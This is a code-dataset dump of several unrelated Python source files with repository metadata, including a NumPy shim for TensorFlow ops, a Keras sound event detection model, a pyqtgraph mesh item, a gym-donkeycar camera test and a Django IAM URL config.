dtype = utils.common_dtype([on_value, off_value], np.float32)
indices = np.array(indices)
depth = np.array(depth)
pred = abs(np.arange(depth, dtype=indices.dtype) -
indices[..., np.newaxis]) > 0
y_out = np.where(pred, np.array(off_value, dtype), np.array(on_value, dtype))
if axis is not None:
y_out = np.moveaxis(y_out, -1, axis)
return y_out
def _ones_like(input, dtype=None, name=None):
return np.ones_like(input, dtype=utils.numpy_dtype(dtype))
def _pad(
tensor,
paddings,
mode='CONSTANT',
constant_values=0,
name=None):
return np.pad(
tensor, paddings,
mode=mode.lower(),
constant_values=constant_values)
def _range(start, limit=None, delta=1, dtype=None, name='range'):
dtype = utils.numpy_dtype(dtype)
start = ops.convert_to_tensor(start, dtype=dtype)
limit = None if limit is None else ops.convert_to_tensor(limit, dtype=dtype)
delta = ops.convert_to_tensor(delta, dtype=dtype)
if dtype is None:
dtype_hierarchy = [np.int32, np.int64, np.float32, np.float64]
inferred_dtype = max([arg.dtype for arg in [start, limit, delta]
if arg is not None],
key=dtype_hierarchy.index)
else:
inferred_dtype = dtype
return np.arange(start, limit, delta).astype(inferred_dtype)
def _reverse(tensor, axis, name=None):
if np.array(axis).ndim == 0:
return np.flip(tensor, axis)
for ax in axis:
tensor = np.flip(tensor, ax)
return tensor
if JAX_MODE:
_searchsorted_vmap_sides = {
side: jax.vmap(functools.partial(jax.numpy.searchsorted, side=side))
for side in ('left', 'right')
}
def _searchsorted(
sorted_sequence,
values,
side='left',
out_type=np.int32,
name=None):
if JAX_MODE:
try:
func = _searchsorted_vmap_sides[side]
except KeyError:
raise ValueError("'%s' is an invalid value for keyword 'side'" % side)
sorted_sequence_2d = np.reshape(sorted_sequence,
(-1, sorted_sequence.shape[-1]))
values_2d = np.reshape(values, (-1, values.shape[-1]))
if sorted_sequence_2d.shape[0] != values_2d.shape[0]:
raise ValueError('Leading dim_size of both tensors must match.')
return np.reshape(func(sorted_sequence_2d, values_2d).astype(out_type),
values.shape)
sorted_sequence = sorted_sequence[..., np.newaxis, :]
values = values[..., :, np.newaxis]
if side == 'left':
is_in_right_location = sorted_sequence < values
elif side == 'right':
is_in_right_location = sorted_sequence <= values
return np.sum(is_in_right_location, axis=-1).astype(out_type)
def _shape(input, out_type=np.int32, name=None):
return ops.convert_to_tensor(ops.convert_to_tensor(input).shape).astype(
out_type)
def _size(input, out_type=np.int32, name=None):
return np.asarray(np.prod(ops.convert_to_tensor(input).shape), dtype=out_type)
builtin_slice = slice
def _slice(input_, begin, size, name=None):
slices = tuple(
builtin_slice(b, b + s if s != -1 else None) for b, s in zip(begin, size))
return input_[slices]
def _split(value, num_or_size_splits, axis=0, num=None, name='split'):
indices_or_sections = np.array(num_or_size_splits)
if indices_or_sections.ndim == 1:
if any(idx == -1 for idx in indices_or_sections):
total_splits = sum(idx for idx in indices_or_sections if idx != -1)
remainder = int(max(0, np.array(value).shape[axis] - total_splits))
indices_or_sections = [
idx if idx != -1 else remainder for idx in indices_or_sections
]
indices_or_sections = np.cumsum(np.array(indices_or_sections))[:-1]
return np.split(value, indices_or_sections, axis)
def _stack(values, axis=0, name='stack'):
del name
if axis is None:
raise ValueError('None values for `axis` argument not supported.')
values = _args_to_matching_arrays(values)
return np.stack(values, axis=axis)
def _transpose(a, perm=None, conjugate=False, name='transpose'):
x = np.transpose(a, perm)
return np.conjugate(x) if conjugate else x
def _zeros_like(input, dtype=None, name=None):
return np.zeros_like(input, dtype=utils.numpy_dtype(dtype))
concat = utils.copy_docstring(
'tf.concat',
_concat)
expand_dims = utils.copy_docstring(
'tf.expand_dims',
lambda input, axis, name=None: np.expand_dims(input, axis))
fill = utils.copy_docstring(
'tf.fill',
lambda dims, value, name=None: np.full(dims, value))
gather = utils.copy_docstring(
'tf.gather',
_gather)
gather_nd = utils.copy_docstring(
'tf.gather_nd',
_gather_nd)
reverse = utils.copy_docstring('tf.reverse', _reverse)
linspace = utils.copy_docstring(
'tf.linspace',
_linspace)
meshgrid = utils.copy_docstring(
'tf.meshgrid',
np.meshgrid)
norm = utils.copy_docstring(
'tf.norm',
norm)
one_hot = utils.copy_docstring(
'tf.one_hot',
_one_hot)
ones = utils.copy_docstring(
'tf.ones',
lambda shape, dtype=np.float32, name=None: np.ones(
shape, utils.numpy_dtype(dtype)))
ones_like = utils.copy_docstring(
'tf.ones_like',
_ones_like)
pad = utils.copy_docstring(
'tf.pad',
_pad)
range = utils.copy_docstring(
'tf.range',
_range)
rank = utils.copy_docstring(
'tf.rank',
lambda input, name=None: np.int32(np.array(input).ndim))
repeat = utils.copy_docstring(
'tf.repeat',
lambda input, repeats, axis=None, name=None: np.repeat(
input, repeats, axis=axis))
reshape = utils.copy_docstring(
'tf.reshape',
lambda tensor, shape, name=None: np.reshape(
ops.convert_to_tensor(tensor), shape))
roll = utils.copy_docstring(
'tf.roll',
lambda input, shift, axis: np.roll(input, shift, axis))
searchsorted = utils.copy_docstring(
'tf.searchsorted',
_searchsorted)
shape = utils.copy_docstring(
'tf.shape',
_shape)
size = utils.copy_docstring(
'tf.size',
_size)
slice = utils.copy_docstring(
'tf.slice', _slice)
split = utils.copy_docstring('tf.split', _split)
squeeze = utils.copy_docstring(
'tf.squeeze',
lambda input, axis=None, name=None: np.squeeze(input, _astuple(axis)))
stack = utils.copy_docstring(
'tf.stack',
_stack)
tile = utils.copy_docstring(
'tf.tile',
lambda input, multiples, name=None: np.tile(np.array(input), multiples))
transpose = utils.copy_docstring(
'tf.transpose',
_transpose)
unstack = utils.copy_docstring(
'tf.unstack',
lambda value, num=None, axis=0, name='unstack': tuple(
np.squeeze(x, axis=axis) for x in
np.split(value, value.shape[axis] if num is None else num, axis)))
where = utils.copy_docstring(
'tf.where',
lambda condition, x=None, y=None, name=None: np.where(condition, x, y))
zeros = utils.copy_docstring(
'tf.zeros',
lambda shape, dtype=np.float32, name=None: np.zeros(
shape, utils.numpy_dtype(dtype)))
zeros_like = utils.copy_docstring(
'tf.zeros_like',
_zeros_like)
| true
| true
|
790c66566a61f71f21523cf5a6ec3643721ff40a
| 6,021
|
py
|
Python
|
src/model/sed_ogits.py
|
Vanova/mfom_attribute_detection
|
450cf79226f2b26407aa0d2636d0f5217d6f4f48
|
[
"MIT"
] | 11
|
2019-03-02T11:05:28.000Z
|
2022-02-15T15:51:46.000Z
|
src/model/sed_ogits.py
|
Vanova/mfom_attribute_detection
|
450cf79226f2b26407aa0d2636d0f5217d6f4f48
|
[
"MIT"
] | null | null | null |
src/model/sed_ogits.py
|
Vanova/mfom_attribute_detection
|
450cf79226f2b26407aa0d2636d0f5217d6f4f48
|
[
"MIT"
] | 5
|
2019-03-02T11:05:31.000Z
|
2020-09-01T20:33:05.000Z
|
import keras.backend as K
from keras.models import Model
from keras.layers import Dense, MaxPooling2D, Conv2D, Activation, \
Dropout, Reshape, Input, BatchNormalization, GRU, Bidirectional, Permute, TimeDistributed
from keras.optimizers import Adam, SGD, Adadelta, RMSprop
import src.model.mfom as mfom
import src.model.objectives as obj
from src.base.model import BaseModel
class SEDOgitsModel(BaseModel):
"""
The Sound Event Detection model.
It has time distributed output layer
# Arguments
input shape: [batch_sz; band; frame_wnd; channel]
"""
def __init__(self, config, input_shape, nclass):
super(SEDOgitsModel, self).__init__(config)
self.input_shape = input_shape
self.nclass = nclass
self.build()
def build(self):
"""
Construct the main structure of the network
"""
print('DNN input shape', self.input_shape)
if K.image_dim_ordering() == 'tf':
batch_sz, bands, frames, channels = self.input_shape
assert channels >= 1
channel_axis = 3
freq_axis = 1
nn_shape = (bands, frames, channels)
else:
raise NotImplementedError('[ERROR] Only for TensorFlow background.')
nb_filters = self.config['feature_maps']
dropout_rate = self.config['dropout']
pool_sz = [5, 2, 2] # max-pooling across frequency only
gru_nb = [32] # [32, 32]
fc_nb = [32]
# Input block
feat_input = Input(shape=nn_shape, name='input')
x = BatchNormalization(axis=freq_axis, name='bn_0_freq')(feat_input)
# CNN block
for sz in pool_sz:
x = Conv2D(filters=nb_filters, kernel_size=(3, 3), padding='same')(x)
x = BatchNormalization(axis=channel_axis)(x)
x = Activation(self.config['activation'])(x)
x = MaxPooling2D(pool_size=(sz, 1))(x)
x = Dropout(dropout_rate)(x)
x = Permute((2, 1, 3))(x)
x = Reshape((frames, -1))(x)
# GRU block
for n in gru_nb:
x = Bidirectional(
GRU(n, activation='tanh', dropout=dropout_rate,
recurrent_dropout=dropout_rate, return_sequences=True),
merge_mode='mul')(x)
# Fully connected
for n in fc_nb:
x = TimeDistributed(Dense(n))(x)
x = Dropout(dropout_rate)(x)
x = TimeDistributed(Dense(self.nclass))(x)
# out dim: [batch, frames, nclass]
y_pred = Activation(activation=self.config['out_score'], name='output')(x)
self._compile_model(input=feat_input, output=y_pred, params=self.config)
def rebuild(self, new_config):
"""
Recompile the model with the new hyper parameters.
NOTE: network topology is changing according to the 'new_config'
"""
self.config.update(new_config)
batch_sz, bands, frames, channels = self.input_shape
self.input_shape = (self.config['batch'], bands, self.config['context_wnd'], channels)
self.build()
def chage_optimizer(self, new_config, change_out_unit=False):
"""
Recompile the model with the new loss and optimizer.
NOTE: network topology is not changing.
"""
if new_config['freeze_wt']:
# train only the top layers,
# i.e. freeze all lower layers
for layer in self.model.layers[:-4]:
layer.trainable = False
# cut MFoM layers: use only output prediction scores
input = self.model.get_layer(name='input').output
output = self.model.get_layer(name='output').output
if change_out_unit:
la = self.model.layers[-2].output
output = Activation(activation=new_config['out_score'], name='output')(la)
print('[INFO] output scores has been changed: %s to %s' % (self.config['out_score'], new_config['out_score']))
self._compile_model(input=input, output=output, params=new_config)
def forward(self, x):
out_model = self.model
if self.model.loss in obj.MFOM_OBJECTIVES:
input = self.model.get_layer(name='input').output
preact = self.model.get_layer(name='output').output
out_model = Model(input=input, output=preact)
return out_model.predict(x)
def _compile_model(self, input, output, params):
"""
Compile network structure with particular loss and optimizer
"""
# ===
# choose loss
# ===
if params['loss'] in obj.MFOM_OBJECTIVES:
# add 2 layers for Maximal Figure-of-Merit
_, _, frames, _ = self.input_shape
y_true = Input(shape=(frames, self.nclass), name='y_true')
psi = mfom.UvZMisclassification(name='uvz_misclass')([y_true, output])
y_pred = mfom.SmoothErrorCounter(name='smooth_error_counter')(psi)
# MFoM need labels info during training
input = [y_true, input]
output = y_pred
loss = obj.MFOM_OBJECTIVES[params['loss']]
elif params['loss'] == obj.mfom_eer_embed.__name__:
loss = obj.mfom_eer_embed
else:
loss = params['loss']
# ===
# choose optimizer
# ===
if params['optimizer'] == 'adam':
optimizer = Adam(lr=params['learn_rate'], beta_1=0.9, beta_2=0.999, epsilon=1e-08)
elif params['optimizer'] == 'sgd':
optimizer = SGD(lr=params['learn_rate'], decay=1e-6, momentum=0.9, nesterov=True)
elif params['optimizer'] == 'adadelta':
optimizer = Adadelta(lr=params['learn_rate'])
elif params['optimizer'] == 'rmsprop':
optimizer = RMSprop(lr=params['learn_rate'])
else:
optimizer = params['optimizer']
self.model = Model(input=input, output=output)
self.model.compile(loss=loss, optimizer=optimizer)
self.model.summary()
| 39.352941
| 122
| 0.603222
|
import keras.backend as K
from keras.models import Model
from keras.layers import Dense, MaxPooling2D, Conv2D, Activation, \
Dropout, Reshape, Input, BatchNormalization, GRU, Bidirectional, Permute, TimeDistributed
from keras.optimizers import Adam, SGD, Adadelta, RMSprop
import src.model.mfom as mfom
import src.model.objectives as obj
from src.base.model import BaseModel
class SEDOgitsModel(BaseModel):
def __init__(self, config, input_shape, nclass):
super(SEDOgitsModel, self).__init__(config)
self.input_shape = input_shape
self.nclass = nclass
self.build()
def build(self):
print('DNN input shape', self.input_shape)
if K.image_dim_ordering() == 'tf':
batch_sz, bands, frames, channels = self.input_shape
assert channels >= 1
channel_axis = 3
freq_axis = 1
nn_shape = (bands, frames, channels)
else:
raise NotImplementedError('[ERROR] Only for TensorFlow background.')
nb_filters = self.config['feature_maps']
dropout_rate = self.config['dropout']
pool_sz = [5, 2, 2]
gru_nb = [32]
fc_nb = [32]
feat_input = Input(shape=nn_shape, name='input')
x = BatchNormalization(axis=freq_axis, name='bn_0_freq')(feat_input)
for sz in pool_sz:
x = Conv2D(filters=nb_filters, kernel_size=(3, 3), padding='same')(x)
x = BatchNormalization(axis=channel_axis)(x)
x = Activation(self.config['activation'])(x)
x = MaxPooling2D(pool_size=(sz, 1))(x)
x = Dropout(dropout_rate)(x)
x = Permute((2, 1, 3))(x)
x = Reshape((frames, -1))(x)
for n in gru_nb:
x = Bidirectional(
GRU(n, activation='tanh', dropout=dropout_rate,
recurrent_dropout=dropout_rate, return_sequences=True),
merge_mode='mul')(x)
for n in fc_nb:
x = TimeDistributed(Dense(n))(x)
x = Dropout(dropout_rate)(x)
x = TimeDistributed(Dense(self.nclass))(x)
y_pred = Activation(activation=self.config['out_score'], name='output')(x)
self._compile_model(input=feat_input, output=y_pred, params=self.config)
def rebuild(self, new_config):
self.config.update(new_config)
batch_sz, bands, frames, channels = self.input_shape
self.input_shape = (self.config['batch'], bands, self.config['context_wnd'], channels)
self.build()
def chage_optimizer(self, new_config, change_out_unit=False):
if new_config['freeze_wt']:
for layer in self.model.layers[:-4]:
layer.trainable = False
input = self.model.get_layer(name='input').output
output = self.model.get_layer(name='output').output
if change_out_unit:
la = self.model.layers[-2].output
output = Activation(activation=new_config['out_score'], name='output')(la)
print('[INFO] output scores has been changed: %s to %s' % (self.config['out_score'], new_config['out_score']))
self._compile_model(input=input, output=output, params=new_config)
def forward(self, x):
out_model = self.model
if self.model.loss in obj.MFOM_OBJECTIVES:
input = self.model.get_layer(name='input').output
preact = self.model.get_layer(name='output').output
out_model = Model(input=input, output=preact)
return out_model.predict(x)
def _compile_model(self, input, output, params):
if params['loss'] in obj.MFOM_OBJECTIVES:
_, _, frames, _ = self.input_shape
y_true = Input(shape=(frames, self.nclass), name='y_true')
psi = mfom.UvZMisclassification(name='uvz_misclass')([y_true, output])
y_pred = mfom.SmoothErrorCounter(name='smooth_error_counter')(psi)
input = [y_true, input]
output = y_pred
loss = obj.MFOM_OBJECTIVES[params['loss']]
elif params['loss'] == obj.mfom_eer_embed.__name__:
loss = obj.mfom_eer_embed
else:
loss = params['loss']
if params['optimizer'] == 'adam':
optimizer = Adam(lr=params['learn_rate'], beta_1=0.9, beta_2=0.999, epsilon=1e-08)
elif params['optimizer'] == 'sgd':
optimizer = SGD(lr=params['learn_rate'], decay=1e-6, momentum=0.9, nesterov=True)
elif params['optimizer'] == 'adadelta':
optimizer = Adadelta(lr=params['learn_rate'])
elif params['optimizer'] == 'rmsprop':
optimizer = RMSprop(lr=params['learn_rate'])
else:
optimizer = params['optimizer']
self.model = Model(input=input, output=output)
self.model.compile(loss=loss, optimizer=optimizer)
self.model.summary()
| true
| true
|
790c667af0b3ef0f91b2ea3e4d81e454bdd15744
| 1,239
|
py
|
Python
|
db_characters.py
|
JackNolanDev/vennt-server
|
03c6c450d50f9f7e8ab0bb844a1cad6b68e5aa47
|
[
"MIT"
] | null | null | null |
db_characters.py
|
JackNolanDev/vennt-server
|
03c6c450d50f9f7e8ab0bb844a1cad6b68e5aa47
|
[
"MIT"
] | null | null | null |
db_characters.py
|
JackNolanDev/vennt-server
|
03c6c450d50f9f7e8ab0bb844a1cad6b68e5aa47
|
[
"MIT"
] | null | null | null |
# Josh Aaron Miller 2021
# VenntDB methods for Characters
import venntdb
from constants import *
# VenntDB Methods
def character_exists(self, username, char_id):
return self.get_character(username, char_id) is not None
def get_character(self, username, char_id):
self.assert_valid("accounts", username, "characters")
if self.is_valid("accounts", username, "characters", char_id):
return self.db["accounts"][username]["characters"][char_id]
return None
def create_character(self, username, character):
self.assert_valid("accounts", username, "characters")
self.db["accounts"][username]["characters"][character["id"]] = character
self.save_db()
def get_characters(self, username):
self.assert_valid("accounts", username, "characters")
return self.db["accounts"][username]["characters"]
def get_attr(self, username, char_id, attr):
self.assert_valid("accounts", username, "characters", char_id)
return self.get_character(username, char_id)[attr]
def set_attr(self, username, char_id, attr, val):
self.assert_valid("accounts", username, "characters", char_id)
self.get_character(username, char_id)[attr] = val
self.save_db()
| 30.219512
| 77
| 0.702986
|
import venntdb
from constants import *
def character_exists(self, username, char_id):
return self.get_character(username, char_id) is not None
def get_character(self, username, char_id):
self.assert_valid("accounts", username, "characters")
if self.is_valid("accounts", username, "characters", char_id):
return self.db["accounts"][username]["characters"][char_id]
return None
def create_character(self, username, character):
self.assert_valid("accounts", username, "characters")
self.db["accounts"][username]["characters"][character["id"]] = character
self.save_db()
def get_characters(self, username):
self.assert_valid("accounts", username, "characters")
return self.db["accounts"][username]["characters"]
def get_attr(self, username, char_id, attr):
self.assert_valid("accounts", username, "characters", char_id)
return self.get_character(username, char_id)[attr]
def set_attr(self, username, char_id, attr, val):
self.assert_valid("accounts", username, "characters", char_id)
self.get_character(username, char_id)[attr] = val
self.save_db()
| true
| true
|
790c6680a68ee15abeaeba01dd8ecfef161ac03b
| 2,404
|
py
|
Python
|
examples/test_cam_config.py
|
vihank/gym-donkeycar
|
2e3cd780d92f3d5da5a0f9c67272a0cd3f08befe
|
[
"MIT"
] | null | null | null |
examples/test_cam_config.py
|
vihank/gym-donkeycar
|
2e3cd780d92f3d5da5a0f9c67272a0cd3f08befe
|
[
"MIT"
] | null | null | null |
examples/test_cam_config.py
|
vihank/gym-donkeycar
|
2e3cd780d92f3d5da5a0f9c67272a0cd3f08befe
|
[
"MIT"
] | null | null | null |
""" Test the gym's code for configuring the DonkeyCar's camera settings.
"""
import os
import argparse
import gym
import gym_donkeycar
import numpy as np
import uuid
if __name__ == "__main__":
# Initialize the donkey environment
# where env_name one of:
env_list = [
"donkey-warehouse-v0",
"donkey-generated-roads-v0",
"donkey-avc-sparkfun-v0",
"donkey-generated-track-v0",
"donkey-roboracingleague-track-v0",
"donkey-waveshare-v0"
]
parser = argparse.ArgumentParser(description='gym_test')
parser.add_argument('--sim', type=str, default="sim_path",
help='path to unity simulator. maybe be left at default if you would like to start the sim on your own.')
parser.add_argument('--port', type=int, default=9091,
help='port to use for websockets')
parser.add_argument('--env_name', type=str, default='donkey-warehouse-v0',
help='name of donkey sim environment', choices=env_list)
args = parser.parse_args()
#%% SET UP ENVIRONMENT
cam = (256,256,3)
conf = {"exe_path" : args.sim,
"host" : "127.0.0.1",
"port" : args.port,
"body_style" : "donkey",
"body_rgb" : (128, 128, 128),
"car_name" : "me",
"font_size" : 100,
"racer_name" : "test",
"country" : "USA",
"bio" : "I am test client",
"guid" : str(uuid.uuid4()),
"cam_resolution" : cam,
"img_w" : cam[0],
"img_h" : cam[1],
"img_d" : cam[2],
}
env = gym.make(args.env_name, conf=conf)
print( "Env cam size: {}".format( env.viewer.get_sensor_size() ) )
speed = 0.5
steer = 0.0
max_steer = 1.0
#%% PLAY
obv = env.reset()
for t in range(100):
action = np.array([steer,speed]) # drive straight with small speed
try:
obv, reward, done, info = env.step(action)
except Exception as ex:
print( "Exception: {}".format( ex ) )
if obv.shape != cam:
print( "Invalid Image size: {}".format( obv.shape ) )
elif t == 10:
print( "Actual camera size: {}".format( obv.shape ) )
if done or (info['hit'] is True):
obv = env.reset()
print( "Exiting d/h: {}/{}".format( done, info['hit'] ) )
break
env.close()
| 27.953488
| 129
| 0.553245
|
import os
import argparse
import gym
import gym_donkeycar
import numpy as np
import uuid
if __name__ == "__main__":
env_list = [
"donkey-warehouse-v0",
"donkey-generated-roads-v0",
"donkey-avc-sparkfun-v0",
"donkey-generated-track-v0",
"donkey-roboracingleague-track-v0",
"donkey-waveshare-v0"
]
parser = argparse.ArgumentParser(description='gym_test')
parser.add_argument('--sim', type=str, default="sim_path",
help='path to unity simulator. maybe be left at default if you would like to start the sim on your own.')
parser.add_argument('--port', type=int, default=9091,
help='port to use for websockets')
parser.add_argument('--env_name', type=str, default='donkey-warehouse-v0',
help='name of donkey sim environment', choices=env_list)
args = parser.parse_args()
cam = (256,256,3)
conf = {"exe_path" : args.sim,
"host" : "127.0.0.1",
"port" : args.port,
"body_style" : "donkey",
"body_rgb" : (128, 128, 128),
"car_name" : "me",
"font_size" : 100,
"racer_name" : "test",
"country" : "USA",
"bio" : "I am test client",
"guid" : str(uuid.uuid4()),
"cam_resolution" : cam,
"img_w" : cam[0],
"img_h" : cam[1],
"img_d" : cam[2],
}
env = gym.make(args.env_name, conf=conf)
print( "Env cam size: {}".format( env.viewer.get_sensor_size() ) )
speed = 0.5
steer = 0.0
max_steer = 1.0
obv = env.reset()
for t in range(100):
action = np.array([steer,speed])
try:
obv, reward, done, info = env.step(action)
except Exception as ex:
print( "Exception: {}".format( ex ) )
if obv.shape != cam:
print( "Invalid Image size: {}".format( obv.shape ) )
elif t == 10:
print( "Actual camera size: {}".format( obv.shape ) )
if done or (info['hit'] is True):
obv = env.reset()
print( "Exiting d/h: {}/{}".format( done, info['hit'] ) )
break
env.close()
| true
| true
|
790c6760cbb5ba7a7d7f0f6662088b050841c907
| 2,274
|
py
|
Python
|
pyqtgraph/opengl/items/GLMeshItem.py
|
robertsj/poropy
|
481a604339c9fa797817b2b0a55448329685c1d8
|
[
"MIT"
] | 1
|
2018-02-11T11:24:14.000Z
|
2018-02-11T11:24:14.000Z
|
pyqtgraph/opengl/items/GLMeshItem.py
|
robertsj/poropy
|
481a604339c9fa797817b2b0a55448329685c1d8
|
[
"MIT"
] | 1
|
2018-06-12T16:15:31.000Z
|
2018-06-12T16:15:31.000Z
|
pyqtgraph/opengl/items/GLMeshItem.py
|
robertsj/poropy
|
481a604339c9fa797817b2b0a55448329685c1d8
|
[
"MIT"
] | 7
|
2015-03-27T16:58:07.000Z
|
2022-01-01T17:44:02.000Z
|
from OpenGL.GL import *
from .. GLGraphicsItem import GLGraphicsItem
from .. MeshData import MeshData
from pyqtgraph.Qt import QtGui
import pyqtgraph as pg
from .. import shaders
import numpy as np
__all__ = ['GLMeshItem']
class GLMeshItem(GLGraphicsItem):
"""
**Bases:** :class:`GLGraphicsItem <pyqtgraph.opengl.GLGraphicsItem>`
Displays a 3D triangle mesh.
"""
def __init__(self, faces, vertexes=None):
"""
See :class:`MeshData <pyqtgraph.opengl.MeshData>` for initialization arguments.
"""
if isinstance(faces, MeshData):
self.data = faces
else:
self.data = MeshData()
self.data.setFaces(faces, vertexes)
GLGraphicsItem.__init__(self)
def initializeGL(self):
self.shader = shaders.getShader('balloon')
l = glGenLists(1)
self.triList = l
glNewList(l, GL_COMPILE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable( GL_BLEND )
glEnable( GL_ALPHA_TEST )
#glAlphaFunc( GL_ALWAYS,0.5 )
glEnable( GL_POINT_SMOOTH )
glDisable( GL_DEPTH_TEST )
glColor4f(1, 1, 1, .1)
glBegin( GL_TRIANGLES )
for face in self.data:
for (pos, norm, color) in face:
glColor4f(*color)
glNormal3f(norm.x(), norm.y(), norm.z())
glVertex3f(pos.x(), pos.y(), pos.z())
glEnd()
glEndList()
#l = glGenLists(1)
#self.meshList = l
#glNewList(l, GL_COMPILE)
#glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
#glEnable( GL_BLEND )
#glEnable( GL_ALPHA_TEST )
##glAlphaFunc( GL_ALWAYS,0.5 )
#glEnable( GL_POINT_SMOOTH )
#glEnable( GL_DEPTH_TEST )
#glColor4f(1, 1, 1, .3)
#glBegin( GL_LINES )
#for f in self.faces:
#for i in [0,1,2]:
#j = (i+1) % 3
#glVertex3f(*f[i])
#glVertex3f(*f[j])
#glEnd()
#glEndList()
def paint(self):
shaders.glUseProgram(self.shader)
glCallList(self.triList)
shaders.glUseProgram(0)
#glCallList(self.meshList)
| 28.78481
| 87
| 0.559367
|
from OpenGL.GL import *
from .. GLGraphicsItem import GLGraphicsItem
from .. MeshData import MeshData
from pyqtgraph.Qt import QtGui
import pyqtgraph as pg
from .. import shaders
import numpy as np
__all__ = ['GLMeshItem']
class GLMeshItem(GLGraphicsItem):
def __init__(self, faces, vertexes=None):
if isinstance(faces, MeshData):
self.data = faces
else:
self.data = MeshData()
self.data.setFaces(faces, vertexes)
GLGraphicsItem.__init__(self)
def initializeGL(self):
self.shader = shaders.getShader('balloon')
l = glGenLists(1)
self.triList = l
glNewList(l, GL_COMPILE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable( GL_BLEND )
glEnable( GL_ALPHA_TEST )
glEnable( GL_POINT_SMOOTH )
glDisable( GL_DEPTH_TEST )
glColor4f(1, 1, 1, .1)
glBegin( GL_TRIANGLES )
for face in self.data:
for (pos, norm, color) in face:
glColor4f(*color)
glNormal3f(norm.x(), norm.y(), norm.z())
glVertex3f(pos.x(), pos.y(), pos.z())
glEnd()
glEndList()
def paint(self):
shaders.glUseProgram(self.shader)
glCallList(self.triList)
shaders.glUseProgram(0)
| true
| true
|
790c67d4a5356bd910dc789a418e8517e5910df9
| 3,052
|
py
|
Python
|
src/api/auth/bkiam/urls.py
|
Chromico/bk-base
|
be822d9bbee544a958bed4831348185a75604791
|
[
"MIT"
] | 84
|
2021-06-30T06:20:23.000Z
|
2022-03-22T03:05:49.000Z
|
src/api/auth/bkiam/urls.py
|
Chromico/bk-base
|
be822d9bbee544a958bed4831348185a75604791
|
[
"MIT"
] | 7
|
2021-06-30T06:21:16.000Z
|
2022-03-29T07:36:13.000Z
|
src/api/auth/bkiam/urls.py
|
Chromico/bk-base
|
be822d9bbee544a958bed4831348185a75604791
|
[
"MIT"
] | 40
|
2021-06-30T06:21:26.000Z
|
2022-03-29T12:42:26.000Z
|
# -*- coding: utf-8 -*
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.conf.urls import url
from iam.contrib.django.dispatcher.dispatchers import (
DjangoBasicResourceApiDispatcher,
success_response,
)
from iam.resource.utils import get_filter_obj, get_page_obj
from auth.bkiam import IAM_REGISTERED_SYSTEM
from auth.bkiam import resources
from auth.bkiam.backend import iam
from auth.bkiam.resources import BKDataResourceProvider
class BKDataDjangoBasicResourceApiDispatcher(DjangoBasicResourceApiDispatcher):
def _dispatch_search_instance(self, request, data, request_id):
options = self._get_options(request)
filter_obj = get_filter_obj(data.get("filter"), ["parent", "keyword"])
page_obj = get_page_obj(data.get("page"))
provider = self._provider[data["type"]]
pre_process = getattr(provider, "pre_search_instance", None)
if pre_process and callable(pre_process):
pre_process(filter_obj, page_obj, **options)
result = provider.list_instance(filter_obj, page_obj, **options)
return success_response(result.to_dict(), request_id)
def register_resources(dispatcher, resources_module):
for item in dir(resources):
if not item.endswith("ResourceProvider"):
continue
resource_class = getattr(resources_module, item)
if issubclass(resource_class, BKDataResourceProvider) and resource_class.resource_type is not None:
dispatcher.register(resource_class.resource_type, resource_class())
dispatcher = BKDataDjangoBasicResourceApiDispatcher(iam, IAM_REGISTERED_SYSTEM)
register_resources(dispatcher, resources)
urlpatterns = [url(r"^resource/api/v1/$", dispatcher.as_view([]), name="iamApi")]
| 44.882353
| 111
| 0.753277
|
from django.conf.urls import url
from iam.contrib.django.dispatcher.dispatchers import (
DjangoBasicResourceApiDispatcher,
success_response,
)
from iam.resource.utils import get_filter_obj, get_page_obj
from auth.bkiam import IAM_REGISTERED_SYSTEM
from auth.bkiam import resources
from auth.bkiam.backend import iam
from auth.bkiam.resources import BKDataResourceProvider
class BKDataDjangoBasicResourceApiDispatcher(DjangoBasicResourceApiDispatcher):
def _dispatch_search_instance(self, request, data, request_id):
options = self._get_options(request)
filter_obj = get_filter_obj(data.get("filter"), ["parent", "keyword"])
page_obj = get_page_obj(data.get("page"))
provider = self._provider[data["type"]]
pre_process = getattr(provider, "pre_search_instance", None)
if pre_process and callable(pre_process):
pre_process(filter_obj, page_obj, **options)
result = provider.list_instance(filter_obj, page_obj, **options)
return success_response(result.to_dict(), request_id)
def register_resources(dispatcher, resources_module):
for item in dir(resources):
if not item.endswith("ResourceProvider"):
continue
resource_class = getattr(resources_module, item)
if issubclass(resource_class, BKDataResourceProvider) and resource_class.resource_type is not None:
dispatcher.register(resource_class.resource_type, resource_class())
dispatcher = BKDataDjangoBasicResourceApiDispatcher(iam, IAM_REGISTERED_SYSTEM)
register_resources(dispatcher, resources)
urlpatterns = [url(r"^resource/api/v1/$", dispatcher.as_view([]), name="iamApi")]
| true
| true
|
790c68773133933418a5d386eacb3bbd8b661688
| 7,002
|
py
|
Python
|
ns-3-dev/doc/models/source/conf.py
|
maxvonhippel/snake
|
0805773dc34e1480dffaae40174aa1f82d1c6ce8
|
[
"BSD-3-Clause"
] | 11
|
2015-11-24T11:07:28.000Z
|
2021-12-23T04:10:29.000Z
|
